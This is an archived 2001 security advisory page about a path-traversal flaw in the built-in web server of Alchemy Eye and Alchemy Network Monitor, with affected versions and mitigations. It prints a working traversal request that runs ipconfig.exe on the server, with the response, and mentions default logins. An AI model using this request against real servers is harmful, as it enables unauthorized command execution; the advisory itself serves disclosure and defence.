Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Security App Flaws :: win4889.htm

Alchemy Eye builtin HTTP server problems
4th Dec 2001 [SBWID-4889]

	Alchemy Eye


	 Alchemy Eye and Alchemy Network Monitor v1.9x through v2.6.18

	 Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10


	In Rapid 7 advisories (R7-0001 & R7-0002) two bugs  on  Alchemy  Eye
	and Alchemy Network Monitor were pointed out (Alchemy  Eye  and  Alchemy
	Network Monitor are network management tools for Microsoft Windows.  The
	product contains a  built-in  HTTP  server  for  remote  monitoring  and
	control) :

	 Remote Command


	The web server used by Alchemy is vulnerable to the /../../ bug.

	$ telnet localhost 80


	          Connected to localhost.

	          Escape character is \'^]\'.

	          GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0


	          HTTP/1.0 200 OK

	          Date: Thu, 29 Nov 2001 18:20:00 GMT

	          Server: Alchemy Eye/2.0.20

	          MIME-version: 1.0

	          Content-Type: text/html

	          Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe

	          Content-Length: 275



	          Windows 2000 IP Configuration


	          Ethernet adapter Cable:


	                  Connection-specific DNS Suffix  . :

	                  IP Address. . . . . . . . . . . . :

	                  Subnet Mask . . . . . . . . . . . :

	                  Default Gateway . . . . . . . . . :






	If nothing has been changed in the eye.ini configuration  file,  default
	login/password will permit access to all logs. Default login/pass is :





	Accordingly with Rapid 7 advisories :


	The current version of the product is VULNERABLE.  Future  versions  may
	also be vulnerable. If you are using any of the vulnerable versions,  we
	suggest the following:

	(a) Disable HTTP access completely via  Preferences.  You  must  restart
	the product for this to take effect.

	or, (b) Require HTTP authentication via Preferences.  You  must  restart
	the product for  this  to  take  effect.  This  is  only  possible  with
	versions 2.6.x  and  later  (earlier  versions  have  no  authentication

	(c) Create a very restricted user account  and  run  the  product  under
	those credentials.










	Disclaimer and Copyright

	    Rapid 7, Inc. is not responsible for the misuse of the information

	    provided in our security advisories. These advisories are a service

	    to the professional security community.  There are NO WARRANTIES

	    with regard to this information. Any application or distribution of

	    this information constitutes acceptance AS IS, at the user\'s own

	    risk.  This information is subject to change without notice.


	    This advisory Copyright (C) 2001 Rapid 7, Inc.  Permission is

	    hereby granted to redistribute this advisory in electronic media

	    only, providing that no changes are made and that the copyright

	    notices and disclaimers remain intact.  This advisory may not be

	    printed or distributed in non-electronic media without the

	    express written permission of Rapid 7, Inc.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH